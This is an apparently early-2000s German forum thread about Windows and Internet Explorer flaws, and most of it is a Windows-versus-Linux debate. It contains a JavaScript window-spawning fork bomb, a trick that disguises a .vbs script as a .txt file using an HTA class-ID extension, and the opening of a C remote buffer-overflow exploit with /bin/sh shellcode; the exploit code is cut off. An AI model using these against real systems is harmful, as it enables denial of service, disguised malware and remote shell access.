Sabine: Exploits

Hallo ihrs!

Gestern bin ich leider nicht mehr dazu gekommen mich über die Exploits bei Windows System während des Threads IE für Linux auszulassen. Da ist mir mein Feierabend zwischen gekommen *g*

Also ... nur mal so einige Exploits

Java-Exploit im IE
Durch einen Fehler des Explorer im Verarbeitungskonzept von JS ist es möglich ihm abstürzen zu lassen da der IE zulässt, dass man Scripts in einer Endlosschleife laufen lassen kann. Wenn man nun ein JS schreibt, dass z.B. ständig die Hintergrundfarbe einer HTML-Seite ändert, dann ist der IE schnell ausgelastet und dann geht gar nichts mehr.

Oder man auch mit dem Aufruf eines HTML-Dokuments gleichzeitig ein anderes starten. So wird von der ursprünglichen Page ein anderes Dokument in einem anderen Fenster geöffnet. Wenn man jedoch das Ursprungsdokument sich selbst aufrufen lässt, dann kommt es zu einer unendlichen Kette von Aufrufen, da die Page sich immer wieder selbst startet. Auch hier macht der IE sehr bald schlapp und stürtz ab. Legt man das Script in eine Schleife, kommt es zu einem Schneeballeffekt, der auch sehr schnell das gesamte System und nicht nur den IE lahmlegt.

Windows Scripting Host
Der WSH ist ein von MS entwickeltes Feature um interaktiven Programmen über das Internet lokalen Zugriff auf den Rechner zu ermöglichen. Solche Programme sind meisten VB Scripte oder ActiveX Controls. Im eigentlichen Sinne ist der WSH kein Exploit, aber er birgt ein großes Gefahrenpotential. Durch die einfachsten Sxripte ermöglicht er nämlich vollen Zugriff auf den lokalen Rechner, samt Registry und aller Daten.Der Explorer ist zwar nur gefährdet, wenn die Progs direkt aus dem Internet ausgeführt werden, aber als Attachment einer Email sind alle Tore geöffnet.

Sicherheitsloch durch Dateiendung
Durch Ausführen einer scheinbar harmlosen Datein, zum Beispiel einer Text-Datei können im Explorer destruktive Scripts gestartet werden. Wenn nämlich die herkömmliche Endung eines VB-Scripts (*.vbs) gegen die Endung "*.txt{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}" ausgetauscht wird, zeigt der Explorer nur noch die Dateiendung *.txt an. da diese spezielle Endung (".xxx{.-.-.}) sonst HTA-Anwendungen zugewiesen ist, bleibt das getarnte Script voll funktionsfähig und wird durch einen Doppelklick im vollem Umfang ausgeführt. So kann ein Script der normalen Dateiendung "destrukt.vbs" in die vermeintlich harmlose Datei "destrukt.txt" umgewandelt werden.

Buffer Overflos im IE
Windows kann mit Dateinamen von 218Byte samt Dateiendung umgehen. Jeder Dateiname der die 218 Byte überschreitet, wird automatisch auf die Größe gekürzt. So wird zum beispiel aus der Datei aa..aa.txt (219 Byte) einfach auf aa..aa.txt (218 Byte) gekürzt. Diese Fehlerkorrektur greift jedoch nicht bei einem Character0160 (bei gedrückter Alt-Taste "0160" auf dem Ziffernblock eingeben). Wenn also eine Datei beispielsweise "testfile.txt                                        " genannt wird, wobei nach der Endung "txt" der chr0160 bis zum Ende der "Rename-Box" eingegeben wird, stellt diese einen potentiellen Windows-Exploit dar. Wenn diese Datei innerhalb von Windows den Focus erhält, also mindestens einmal auf sie geklickt wird, führt das zu einem Windows-Fehler und damit zu einem Absturz.

So, ich denke, das sollte reichen *g*

Liebe Grüße

Sabine

  1. Hallo ihrs!

    Gestern bin ich leider nicht mehr dazu gekommen mich über die Exploits bei Windows System während des Threads IE für Linux auszulassen. Da ist mir mein Feierabend zwischen gekommen *g*

    dann erzähl ma...

    Java-Exploit im IE
    Durch einen Fehler des Explorer im Verarbeitungskonzept von JS ist es möglich ihm abstürzen zu lassen da der IE zulässt, dass man Scripts in einer Endlosschleife laufen lassen kann. Wenn man nun ein JS schreibt, dass z.B. ständig die Hintergrundfarbe einer HTML-Seite ändert, dann ist der IE schnell ausgelastet und dann geht gar nichts mehr.

    mach das mal im Mozilla. DER stürtzt ab. Der IE bringt irgendwann ne Meldung wie "Ihr Script braucht zu viel Resourcen und lässt den IE langsam laufen - wollen sie es beenden" oder so

    Oder man auch mit dem Aufruf eines HTML-Dokuments gleichzeitig ein anderes starten. So wird von der ursprünglichen Page ein anderes Dokument in einem anderen Fenster geöffnet. Wenn man jedoch das Ursprungsdokument sich selbst aufrufen lässt, dann kommt es zu einer unendlichen Kette von Aufrufen, da die Page sich immer wieder selbst startet. Auch hier macht der IE sehr bald schlapp und stürtz ab. Legt man das Script in eine Schleife, kommt es zu einem Schneeballeffekt, der auch sehr schnell das gesamte System und nicht nur den IE lahmlegt.

    hä? versteh ich net. erklär ma genauer. Sowas hab ich ja noch nie gesehen.

    Windows Scripting Host
    Der WSH ist ein von MS entwickeltes Feature um interaktiven Programmen über das Internet lokalen Zugriff auf den Rechner zu ermöglichen. Solche Programme sind meisten VB Scripte oder ActiveX Controls. Im eigentlichen Sinne ist der WSH kein Exploit, aber er birgt ein großes Gefahrenpotential. Durch die einfachsten Sxripte ermöglicht er nämlich vollen Zugriff auf den lokalen Rechner, samt Registry und aller Daten.Der Explorer ist zwar nur gefährdet, wenn die Progs direkt aus dem Internet ausgeführt werden, aber als Attachment einer Email sind alle Tore geöffnet.

    löl - wenn ich nen Virus aufmachen isses dasselbe. Wenn Linux weiter verbreitet wäre würds au mehr Viren für Linux geben. Aber der durchschnittliche Linux - Nutzer is net blöde und somit auch net die Zielgruppe von Viren.

    Sicherheitsloch durch Dateiendung
    Durch Ausführen einer scheinbar harmlosen Datein, zum Beispiel einer Text-Datei können im Explorer destruktive Scripts gestartet werden. Wenn nämlich die herkömmliche Endung eines VB-Scripts (*.vbs) gegen die Endung "*.txt{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}" ausgetauscht wird, zeigt der Explorer nur noch die Dateiendung *.txt an. da diese spezielle Endung (".xxx{.-.-.}) sonst HTA-Anwendungen zugewiesen ist, bleibt das getarnte Script voll funktionsfähig und wird durch einen Doppelklick im vollem Umfang ausgeführt. So kann ein Script der normalen Dateiendung "destrukt.vbs" in die vermeintlich harmlose Datei "destrukt.txt" umgewandelt werden.

    das funtzt nur für dumme, weil die txt dann tortzdem ausschaut wie ne .vbs. Ausserdem hab ich den Schrott mit den Dateiendungen abgestellt.

    Buffer Overflos im IE
    Windows kann mit Dateinamen von 218Byte samt Dateiendung umgehen. Jeder Dateiname der die 218 Byte überschreitet, wird automatisch auf die Größe gekürzt. So wird zum beispiel aus der Datei aa..aa.txt (219 Byte) einfach auf aa..aa.txt (218 Byte) gekürzt. Diese Fehlerkorrektur greift jedoch nicht bei einem Character0160 (bei gedrückter Alt-Taste "0160" auf dem Ziffernblock eingeben). Wenn also eine Datei beispielsweise "testfile.txt                                        " genannt wird, wobei nach der Endung "txt" der chr0160 bis zum Ende der "Rename-Box" eingegeben wird, stellt diese einen potentiellen Windows-Exploit dar. Wenn diese Datei innerhalb von Windows den Focus erhält, also mindestens einmal auf sie geklickt wird, führt das zu einem Windows-Fehler und damit zu einem Absturz.

    glaub ich neeeeeet *test*

    So, ich denke, das sollte reichen *g*

    mhh.... wennste meinst.

    Liebe Grüße

    Sabine

    greets Back TOM

    1. Hallo!

      Das mit dem Schneeballsystem? Das ist recht einfach. Du hast eine Seite, die sich immer wieder selbst aufruft. Ist eigentlich das selbe System wie mit Kettenbriefen. Das erste Fenster öffnet sich, öffnet sich selbst noch mal, man hat dann 2. Diese beiden öffnen jeweils wieder ein Fenster. Man hat vier Fenster ... usw. Vorausgesetzt, man schließt die Fenstern dann nicht. Nur im Normalfall ist der User eben dumm und das Script öffnet die Fenster schneller als der User die Fenster schliessen kann ... jedenfalls der DAU :)

      Liebe Grüße

      Sabine

      1. Ja ok das is mies aber dafür gibts ja den TASK Manager :)

        Aber das mit deinem .txt+Charakter0160 funtzt net

        hab ich gemacht

        2 mal sogar g

        das juckt mein NT net :-P *bäääääh*

        Das sind warscheinlich WindowsME - Probs.
        Das is ja eh die größte Fehlkonstruktion die M$ jemals rausgebracht hat. Über das BS könnt ich mich den ganzen Tag auslassen *rofl*

        greets from Erlangen Research Center -- TOM

        1. Hehe, dann ist ja gut. Unter NT hab ich das auch ehrlich gesagt noch nicht ausprobiert. Aber wenn dein BS die Endungen eh nicht interessieren, dann bringt das auch nichts :)

          WindowsME? *bibber* Nein danke. Dann kann ich meinen Rechner gleich aus dem Fenster schmeissen, dann ist der genauso arbeitswillig und prakisch wie wenn ME drauf läuft! Nein danke. ME ist ja fast noch schlimmer als XP. Jaja, es gibt eben Fehlkonstruktionen auf dem Markt ... Microsoft ist die größte.

          Liebe Grüße

          Sabine

          1. Hiho

            [...] ME ist ja fast noch schlimmer als XP.

            ähm. Ich muss zwar zugeben dass ich zuhause mein XP wieder glattgebügelt hab und 2K installiert hab, aber ME ist EINDEUTIG schlimmer als XP

            was is an XP so schlimm??

            ich kann zu XP sagen:

            o unstabiler wie 2K aber WELTEN stabiler wie alle 9x Systeme - hoffe das wird mitm neuen SP besser

            o vielen Schnickschnack aber man kann ihn ja zum Glück abstellen

            o der Hardwaresupport ist einfach nur erstaunlich. Ich hatte das Bs auf Rechner A installiert und dann als BS in rechner B reingeschoben. Innerhalb von 2 min. ware ALLE Hardware erkannt. Kein Neustart - nix.

            -> wieso soll ich mir arbeit machen wenns auch so geht? Ok ein oder 2 Treiber tauscht man aus, weil sie einem net passen aber sonst? Genial

            o Gibt eine Features von dem oben genannten Schnickschnack die echt gut sind g*

            greets from Erlangen Research Center -- tOM

            P.S.: nö hab mich nicht verschrieben - ich weschsle jetzt meine Namens-Schreibweise g*

            1. Hi du!

              Also ich sag dazu nur, dass mir weder ME noch XP auf den Rechner kommt. Ich hab auf nem Labtop mal XP installiert ... gut, das war schön und einfach ... Idiotensicher einfach. Aber eh ich das den ganzen Schnickschnack ausgestellt hab, den ich eh nicht brauch und der nur Sicherheitslücken hinterlässt, wenn man ihn anlässt ... nee, in der Zeit hab ich auch Linux installiert und unter Linux hatte ich noch nie Probleme mit meiner Hardwareerkennung. Na gut, wahrscheinlich hab ich auch keine Hardware, die zu exotisch ist *g*
              Und Linux will auch nicht neustarten :)

              Liebe Grüße

              Sabine

              1. Mhh

                in der Zeit hast du Linux installiert?

                pah

                dann gehts doch erst richtig los, was im Windoof alles einfacher ist.

                o Du musst die Firewall einrichten.

                o Dann wirste mit nen Emulator anfagen müssen, weil es einfach viele Programme net gibt, die man braucht. -> schon wieder arbeit

                o Und sonstige Einstellungen / Installationen die man machen muss geben auch nochmal ne menge Arbeit auf.

                also sag net es wär viel arbeit 10 min. zu verwenden Windows-XP-Features abzustellen

                TOM

                1. Naja, und mal ganz davon abgesehen, dass ich Windows eh nicht wirklich nutzen mag. Also, da investiere ich lieber die Zeit um meine Firewall zu konfigurieren und so ... naja und unter Linux gibt es eben auch schon sehr viele Programme, die es unter Windows auch gibt und nützlich sein mögen. Die sehen dann ein wenig anders aus, bewirken aber das selbe und ich bin Windows los :)

                  Liebe Grüße

                  Sabine

                  1. Naja, und mal ganz davon abgesehen, dass ich Windows eh nicht wirklich nutzen mag. Also, da investiere ich lieber die Zeit um meine Firewall zu konfigurieren und so ... naja und unter Linux gibt es eben auch schon sehr viele Programme, die es unter Windows auch gibt und nützlich sein mögen. Die sehen dann ein wenig anders aus, bewirken aber das selbe und ich bin Windows los :)

                    SO!

                    jetzt haben wir den Grund des Übels *g*

                    du magst M$ einfach net. Sags doch gleich *g*

                    Liebe Grüße

                    Sabine

                    greetings from Erlangen Research Center -- tOM, der jetzt wieder mal richtig weiterarbeiten muss :-P

                    1. *räusper* Na ... also ... nicht mögen ... *rmdrucks* Ja, okay, du hast ja recht :) Stimmt schon ... *pfeif*

                      Liebe Grüße

                      Sabine, die jetzt auch mal langsam wieder was tun sollte ... auch wenn sie bei dem schönen Wetter gar keine Lust hat.

                2. Moin,

                  dann gehts doch erst richtig los, was im Windoof alles einfacher ist.

                  also sag net es wär viel arbeit 10 min. zu verwenden Windows-XP-Features abzustellen

                  Also wenn ich mir mein System wohnlich einrichte, dann dauert das mindestens einen Monat, eher mehr. Da ist die Phase der anfänglichen Betriebssysteminstallation vernachlässigbar klein, so dass hier keine Unterschiede entstehen. (Ja, ich habe für meine SuSE-Installation einen der umwegreichsten Wege gewählt und ca. 2 Tage damit verbracht.)

                  Wo es jedoch Unterschiede gibt, ist die Konfigurierbarkeit des Systems und der Oberfläche. Und da verliert Windows haushoch in allen Kategorien.

                  Damals ging das übrigens noch. Unter meinem WfW 3.11 konnte man sogar die shell (Standard war der Programm-Manager, also das was heute explorer.exe ist) austauschen ohne das System unbrauchbar zu machen. Ich hatte dafür ein kleines Programm (Win-Jade, wenn ich mich richtig erinnere) entdeckt, das sich angenehm in Hintergrund hielt (also unsichtbar war) und bei Rechtsklick auf den Hintergrund ein Menü mit den von mir verwendeten Programmen anzeigte. Das war deutlich hübscher als der olle Programm-Manager und noch dazu kleiner (== schneller). Aber ich schweife ab...

                  Ja, meine damalige Installation mit DOS 6.2 und WfW 3.11 ist deutlich länger als 2 Monate gereift und sie hat mir gefallen. Heutzutage kann man sich unter Windows nicht mal mehr aussuchen, welche Browser man auf seiner Festplatte haben möchte.

                  --
                  Henryk Plötz
                  Grüße aus Berlin

                  * Help Microsoft combat software piracy: Give Linux to a friend today! *

                  1. Hallo,

                    Damals ging das übrigens noch. Unter meinem WfW 3.11 konnte man sogar die
                    shell (Standard war der Programm-Manager, also das was heute explorer.exe ist)
                    austauschen ohne das System unbrauchbar zu machen.

                    Das geht heute auch :) Ein Eintag in der win.ini. Aber ich weiss gerade nicht,
                    wie der heisst -- ich hab hier ein UNIX-System.

                    Gruesse,
                     CK

                    1. Moin,

                      Das geht heute auch :) Ein Eintag in der win.ini. Aber ich weiss gerade nicht,
                      wie der heisst -- ich hab hier ein UNIX-System.

                      Ja, shell=, das war er zumindest damals. Aber glaube mir, das willst du nicht machen, wenn du das System noch 'sinnvoll' benutzen willst, zumindest soweit ich mich erinnern kann. (BTDT, auf einem Rechner auf dem explorer.exe defekt war.)
                      Und bei neueren NT-basierten Systemen glaube ich nicht mal, dass es da sowas überhaupt noch gibt.

                      --
                      Henryk Plötz
                      Grüße aus Berlin

                      * Help Microsoft combat software piracy: Give Linux to a friend today! *

                      1. Hallo,

                        Ja, shell=, das war er zumindest damals.

                        Ja, das koennte sein.

                        Aber glaube mir, das willst du nicht machen, wenn du das
                        System noch 'sinnvoll' benutzen willst, zumindest soweit ich
                        mich erinnern kann.

                        Warum nicht? Das habe ich schonmal getan. Ich musste einen
                        Desktop-Rechner sinnvoll vor manipulationen schuetzen, also
                        habe ich mit Delphi einen sehr, sehr eingeschraenkten WM
                        geschrieben.

                        Und bei neueren NT-basierten Systemen glaube ich nicht mal,
                        dass es da sowas überhaupt noch gibt.

                        Win95A, B, C, Win98, Win98 SE, WinME, WinXP, Win2k, bei denen
                        geht es sicher. Bei den anderen bin ich mir nicht sicher.

                        Gruesse,
                         CK

                        1. Moin,

                          Warum nicht? Das habe ich schonmal getan. Ich musste einen
                          Desktop-Rechner sinnvoll vor manipulationen schuetzen, also
                          habe ich mit Delphi einen sehr, sehr eingeschraenkten WM
                          geschrieben.

                          Ah ok, wenn man den Rechner einschränken will geht das natürlich. Ich dachte aber eher an normale Benutzung, bloss dass eben eine andere Shell als Zeichen meiner Individualität benutzt wird, und das ging (zumindest wenn ich mich richtig erinnere) nicht gut.

                          Win95A, B, C, Win98, Win98 SE, WinME, WinXP, Win2k, bei denen
                          geht es sicher. Bei den anderen bin ich mir nicht sicher.

                          Hmm, interessant. Dabei haben die beiden letztgenannten doch gar keinen DOS-Unterbau mehr, von dem die win.ini ursprünglich abstammt.

                          --
                          Henryk Plötz
                          Grüße aus Berlin

                          * Help Microsoft combat software piracy: Give Linux to a friend today! *

                3. Aloha!

                  dann gehts doch erst richtig los, was im Windoof alles einfacher ist.

                  o Du musst die Firewall einrichten.

                  Wozu?

                  o Dann wirste mit nen Emulator anfagen müssen, weil es einfach viele Programme net gibt, die man braucht. -> schon wieder arbeit

                  Linux hat mehr Programme, als du denkst. Die heißen nur nicht "Microsoft X".

                  o Und sonstige Einstellungen / Installationen die man machen muss geben auch nochmal ne menge Arbeit auf.

                  Konfigurations-TEXT-Dateien aus der alten Installation rüberretten und nach /etc kopieren - ggf. leicht anpassen. Oder wahlweise funktionierende Konfigurationen aus dem Netz ziehen. Dürfte nicht viel komplizierter sein.

                  also sag net es wär viel arbeit 10 min. zu verwenden Windows-XP-Features abzustellen

                  Das größte Problem in Windows (egal welche Version) ist, dass die Programme richtig _installiert_ werden müssen. Die wenigsten laufen durch simples Kopieren einfach los. Damit geht die Zeit drauf.

                  - Sven Rautenberg

            2. Hallo!

              Dem kann ich nur 100%ig zustimmen, ich verwende zwar win2K, und das ist wirklich superstabil, aber WinXP ist auch nicht viel schlechter, vor allem funktioniert es ohne das Du großes Hintergrundwissen brauchst, udn das ist es was die meisten Leute wollen(ein Arbeitsgerät, Mittel zum Zweck, nicht Weltanschaung), wenn sie sich dadurch zur Zeilscheibe für Viren machen - gut, aber ich kenne persönlich nur eine Person der ein Virus mal die komplette Festplatte zerstört hat, sonst ist mir nichts wirklich schlimmes bekannt!(Übrigens hat Linux selbst das bei mir auch schonmal geschafft!!!!!!!!!)
              Und mit aktuellen Virenscannern(was der Typ nicht hatte) ist das "sicher genug" wie ich finde.

              Grüße
              Andreas

              PS: Aber browsermäßig bin ich eigentlich(nicht in diesem Moment ;-) auf Netsape 7 umgestiegen, finde ich besser als IE 6!

              1. Hallo,

                Dem kann ich nur 100%ig zustimmen, ich verwende zwar win2K, und das ist wirklich superstabil, aber WinXP ist auch nicht viel schlechter, ...

                mhm, ich arbeite wenig mit win2K, durfte aber schon 2 Abstuerze mit Neuboot miterleben.
                vor allem funktioniert es ohne das Du großes Hintergrundwissen brauchst, udn das ist es was die meisten Leute wollen(ein Arbeitsgerät, Mittel zum Zweck, nicht Weltanschaung),
                mhm, wieso hatte ich dann im letzten Jahr drei Maschinen (Win95, Win98,WinMe) auf meinem Schreibtisch, die nicht mehr gingen (privates Umfeld)? Und die Leute, die da dran sassen, haben gar nicht die Kenntnisse, da viel kaputt zu machen. Aber eins muss ich dann doch lobend erwaehnen: die Systemwiederherstellung des Aldi-Rechners war schon klasse. Gut, saemtliche Einstellungen waren hinueber, aber immherhin kein echter Datenverlust. Leider lag das nicht am OS (ME), sondern an der vorausschauenden Planung des Medion-Service.
                wenn sie sich dadurch zur Zeilscheibe für Viren machen - gut, aber ich kenne persönlich nur eine Person der ein Virus mal die komplette Festplatte zerstört hat, sonst ist mir nichts wirklich schlimmes bekannt!(Übrigens hat Linux selbst das bei mir auch schonmal geschafft!!!!!!!!!)
                Wie hat Linux denn die Festplatte gekillt? Bei der Installation die Windows-Partition ueber den Jordan geschickt oder im laufenden Betrieb?

                Und mit aktuellen Virenscannern(was der Typ nicht hatte) ist das "sicher genug" wie ich finde.

                Der beste Virenscanner ist ein zoegerlicher Zeigefinger beim Druck auf "OK".

                Gruss
                Thomas

                1. Hallo,

                  Dem kann ich nur 100%ig zustimmen, ich verwende zwar win2K, und das ist wirklich superstabil, aber WinXP ist auch nicht viel schlechter, ...
                  mhm, ich arbeite wenig mit win2K, durfte aber schon 2 Abstuerze mit Neuboot miterleben.

                  Was machst Du denn damit? ich habe das manchmal tagelang durchlaufen, das einzige was hier und da abstürzt sind IE und Netscape, der Rest läuft sehr stabil. Das OS ist mir glaube ich noch nie komplett abgestürzt(XP, womit ich höchstens 1% von Win2K gearbeitet habe übrigens schon 2 mal!)

                  vor allem funktioniert es ohne das Du großes Hintergrundwissen brauchst, udn das ist es was die meisten Leute wollen(ein Arbeitsgerät, Mittel zum Zweck, nicht Weltanschaung),
                  mhm, wieso hatte ich dann im letzten Jahr drei Maschinen (Win95, Win98,WinMe) auf meinem Schreibtisch, die nicht mehr gingen (privates Umfeld)? Und die Leute, die da dran sassen, haben gar nicht die Kenntnisse, da viel kaputt zu machen. Aber eins muss ich dann doch lobend erwaehnen: die Systemwiederherstellung des Aldi-Rechners war schon klasse. Gut, saemtliche Einstellungen waren hinueber, aber immherhin kein echter Datenverlust. Leider lag das nicht am OS (ME), sondern an der vorausschauenden Planung des Medion-Service.
                  wenn sie sich dadurch zur Zeilscheibe für Viren machen - gut, aber ich kenne persönlich nur eine Person der ein Virus mal die komplette Festplatte zerstört hat, sonst ist mir nichts wirklich schlimmes bekannt!(Übrigens hat Linux selbst das bei mir auch schonmal geschafft!!!!!!!!!)
                  Wie hat Linux denn die Festplatte gekillt? Bei der Installation die Windows-Partition ueber den Jordan geschickt oder im laufenden Betrieb?

                  Ich hate Linux 2 mal am Laufen, aber nach 3-4 Neustarts konnte ich zugucken wie immer weniger funktionierte, bis hinterher KDE nicht mehr ging. Naja, beim letzten Versuch habe ich dann wohl die Partitionstabelle zerschossen (ich habe nichts gemacht außer den Empfehlungen von Suse 7.3 zuzustimmen), naja, dann war ich es wohl selbst da ich mich nicht auskannte, aber mit Win passiert sowas komischerweise nicht! Da kann jeder SuperDAU auf OK....OK klicken und hat am Ende zwar ein unsicheres OS, aber er hat eins!
                  Es muß mal eine Distribution geben, die Hardware... so gut erkennt wie eine aktuelle Windows-Version, vor allem die Festplatten/Partitionen! Ein höherer Schwierigkeitsgrad ist es nunmal Wimn und Linux parallel zu installieren, aber das muß doch irgendwann mal EINFACH funktionieren, oder?

                  Und mit aktuellen Virenscannern(was der Typ nicht hatte) ist das "sicher genug" wie ich finde.
                  Der beste Virenscanner ist ein zoegerlicher Zeigefinger beim Druck auf "OK".

                  Naja, den brauchen die vbs Viren ja gar nicht mehr...
                  Ich finde das Doppelklicken auf Anhänge von mails, die "aus Verrsehen" an den DAU geschickt wurden am schlimmsten!

                  Vor allem werden die immer Ideenreicher!

                  Viele Grüße
                  Andreas

                  1. Hallo,

                    zuerst mal sorry wegen meinem Quotingstil eben, da ist mir einiges verrutscht.

                    Was machst Du denn damit? ich habe das manchmal tagelang durchlaufen, das einzige was hier und da abstürzt sind IE und Netscape, der Rest läuft sehr stabil. Das OS ist mir glaube ich noch nie komplett abgestürzt(XP, womit ich höchstens 1% von Win2K gearbeitet habe übrigens schon 2 mal!)

                    Du wirst lachen, nichts! Beim ersten Absturz (es war der Rechner meiner "Nachbarin" im Computerraum) waren wir gerade am Quatschen und der Bildschirmschoner war an, sonst kein offenes Programm. Als sie wieder arbeiten wollte, ging nichts mehr, keine Maus, kein ALT+STRG+DEL, nichts. Und beim zweiten Mal hatte sich das System wohl an einem Programm (C++) bei der Entwicklung verschluckt, obwohl da gar nichts so grosses passiert. Es war nicht mein Rechner [1], ich war nur dabei (also kein Hoerensagen).

                    Ich hate Linux 2 mal am Laufen, aber nach 3-4 Neustarts konnte ich zugucken wie immer weniger funktionierte, bis hinterher KDE nicht mehr ging. Naja, beim letzten Versuch habe ich dann wohl die Partitionstabelle zerschossen (ich habe nichts gemacht außer den Empfehlungen von Suse 7.3 zuzustimmen), naja, dann war ich es wohl selbst da ich mich nicht auskannte, aber mit Win passiert sowas komischerweise nicht! Da kann jeder SuperDAU auf OK....OK klicken und hat am Ende zwar ein unsicheres OS, aber er hat eins!

                    Ich halte die Aussage oben so aber nicht fuer richtig. Wirklich "Windows" installieren tut kaum ein Anfaenger, das ist schon auf der Platte. Dementsprechend problematisch ist eben die Installation von Linux, weil man sich die Daten ja auch nicht zerschiessen will.

                    Es muß mal eine Distribution geben, die Hardware... so gut erkennt wie eine aktuelle Windows-Version, vor allem die Festplatten/Partitionen! Ein höherer Schwierigkeitsgrad ist es nunmal Wimn und Linux parallel zu installieren, aber das muß doch irgendwann mal EINFACH funktionieren, oder?

                    Ich kann mich ueber meine Installation (Win98 / Debian 2.2) eigentlich nicht beschweren. Das Handbuch lesen war nervig (aber lehrreich) und ich habe mich bei jedem kritischen Schritt (Neupartitionieren) auch gefragt, ob meine Platte danach noch lebt (ja, es war meine erste Partitionierung), aber grundsaetzlich hat das alles gut funktioniert.

                    Hardware erkennen ist uebrigens nicht wirklich hilfreich; mein System erkennt meinen Scanner ganz gut, da es aber keine Treiber gibt, ist er unter Linux nicht benutzbar (ich habe mich aber auch schon eine ganze Weile nicht mehr darum gekuemmert, ist kein wichtiges Problem).

                    Der beste Virenscanner ist ein zoegerlicher Zeigefinger beim Druck auf "OK".
                    Naja, den brauchen die vbs Viren ja gar nicht mehr...
                    Ich finde das Doppelklicken auf Anhänge von mails, die "aus Verrsehen" an den DAU geschickt wurden am schlimmsten!

                    Das ist Reflex aufgrund der vielen Meldungen,die Windows immer so bringt. Allerdings hilft die Kombination "Nicht-IE / Nicht-OE" ziemlich gut (auf dem Rechner meiner Freundin).

                    [1] Ich benutze Win nur, um ueber ein X-Windows auf den Linux-Server zu kommen, da fuehle ich mich inzwischen einfach wohler.

                    Gruss
                    Thomas

    2. hä? versteh ich net. erklär ma genauer. Sowas hab ich ja noch nie gesehen.

      <script type="text/javascript">
      funktion forkbomb()
      {
        for (;;)
        {
          window.open(document.URL);
        }
      }
      </script>
      ....
      <body onLoad="forkbomb();">
      ...

      Stefan

  2. Hi,

    Also ... nur mal so einige Exploits

    So so dann los,

    Java-Exploit im IE
    Durch einen Fehler des Explorer im Verarbeitungskonzept von JS ist es möglich ihm abstürzen zu lassen da der IE zulässt, dass man Scripts in einer Endlosschleife laufen lassen kann. Wenn man nun ein JS schreibt, dass z.B. ständig die Hintergrundfarbe einer HTML-Seite ändert, dann ist der IE schnell ausgelastet und dann geht gar nichts mehr.

    Das ist kein Exploit!

    Oder man auch mit dem Aufruf eines HTML-Dokuments gleichzeitig ein anderes starten. So wird von der ursprünglichen Page ein anderes Dokument in einem anderen Fenster geöffnet. Wenn man jedoch das Ursprungsdokument sich selbst aufrufen lässt, dann kommt es zu einer unendlichen Kette von Aufrufen, da die Page sich immer wieder selbst startet. Auch hier macht der IE sehr bald schlapp und stürtz ab. Legt man das Script in eine Schleife, kommt es zu einem Schneeballeffekt, der auch sehr schnell das gesamte System und nicht nur den IE lahmlegt.

    Das ist kein Exploit!

    Buffer Overflos im IE
    Windows kann mit Dateinamen von 218Byte samt Dateiendung umgehen. Jeder Dateiname der die 218 Byte überschreitet, wird automatisch auf die Größe gekürzt. So wird zum beispiel aus der Datei aa..aa.txt (219 Byte) einfach auf aa..aa.txt (218 Byte) gekürzt. Diese Fehlerkorrektur greift jedoch nicht bei einem Character0160 (bei gedrückter Alt-Taste "0160" auf dem Ziffernblock eingeben). Wenn also eine Datei beispielsweise "testfile.txt                                        " genannt wird, wobei nach der Endung "txt" der chr0160 bis zum Ende der "Rename-Box" eingegeben wird, stellt diese einen potentiellen Windows-Exploit dar. Wenn diese Datei innerhalb von Windows den Focus erhält, also mindestens einmal auf sie geklickt wird, führt das zu einem Windows-Fehler und damit zu einem Absturz.

    Das ist kein Exploit! Das ist kein Buffer Overflow!

    Also Sabine, ein exploit ist ein Programm oder Script welches sich über eine Sicherheitsklücke zugang zu einem Rechner verschafft und dort weiß Gott was macht. Du hast hier eigentlich nur von Systemfehlern die zu Abstürzen führen können, geredet.

    Ein Buffer Overflow entsteht wenn Speicherinhalte größer sind als ihnen vom System her zugedacht ist. Bei mangelnder Fehlerabhandlung können diese Lange Daten, Programmteile im Speicher überschreiben, so lässt sich z.B. ein call auf systemfunktionen durchführen, die etwas anstellt. Das ist allerdings eine sehr komplexe Sache und nicht mit deinem Dateinamen Spielchen vergleichbar.

    So, ich denke, das sollte reichen *g*

    Für was? Da war nix wirklich gutes dabei.

    Gruß

    ueps

    1. Hi ueps!

      Soll ich dir hier jetzt den Progammcode reinschreiben, der dann die Sicherheitslücken nutzt, die ich erwähnt habe, oder wie soll ich dir beweisen, dass es auch Frauen gibt, die davon Ahnung haben?

      Liebe Grüße

      Sabine

      1. Hi,

        Soll ich dir hier jetzt den Progammcode reinschreiben, der dann die Sicherheitslücken nutzt, die ich erwähnt habe, oder wie soll ich dir beweisen, dass es auch Frauen gibt, die davon Ahnung haben?

        Hab ich gesagt das Frauen keine Ahnung haben? Nein!
        Und zu diesem Thema muss jetzt bitte nicht schon wieder eine endlose Diskussion entstehen.

        Du brauchst keinen Programmcode reinschreiben, es langt vollkommen einen wirklichen Exploit und welches Loch er ausnutzt, zu erklären.
        Deine Beispiele nutzen keine Lücke aus, sondern führen nur zur Speicherüberlastung oder sonstigen relativ harmlosen Fehlern.

        Das VB Scripte und sonstige Dateianhänge bei mangelnder Sicherheitsbeachtung Risiken bringen, ist längst bekannt.

        Gruß

        ueps

        1. Das Programm erledigt folgende Aufgaben (sollte es zumindest):
          Zusammensetzen des Angriffspuffers aus den NOP Befehlen, dem Maschinencode und der vermuteten Sprungadresse.
          Aufbauen einer Netzwerkverbindung zu unserem Netzwerkdienst auf dem Zielrechner.
          Übergabe des Angriffspuffers als Antwort auf die Aufforderung der Namenseingabe
          Aufsetzen eines simplen Terminalprogramms auf die Netzwerkverbindung zum Zielrechner, um mit der auf der anderen Seite durch den Maschinencode gestarteten Shell kommunizieren zu können

          Zufrieden?

          #include <stdio.h>
          #include <errno.h>
          #include <sys/types.h>
          #include <sys/socket.h>
          #include <netinet/in.h>
          #include <unistd.h>
          #include <stdlib.h>
          #include <time.h>
          #include <string.h>

          #define PORT 100   /*target port*/
          #define NOP 0x90   /*NOP instruction on ix86*/
          #define CODE_OFFSET 200   /*offset for machinecode in buffer*/
          #define BUFFER_LOCATION 0xbffff36c /*guessed location of the target buffer*/
          #define ATTACK_BUFFER_SIZE 356 /*size of the target buffer + overflow*/

          /*WARNING: CODE_OFFSET, BUFFER_LOCATION AND ATTACK_BUFFER_SIZE MUST BE MULTIPLES OF 4*/

          /*the machine code that will execute /bin/sh*/
          char shellcode[] =
                             "\xeb\x18\x5d\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45"
                             "\x0c\xb0\x0b\x89\xeb\x8d\x4d\x08\x8d\x55\x0c\xcd\x80"
                             "\xe8\xe3\xff\xff\xff/bin/sh";

          void usage(char *name)
          {
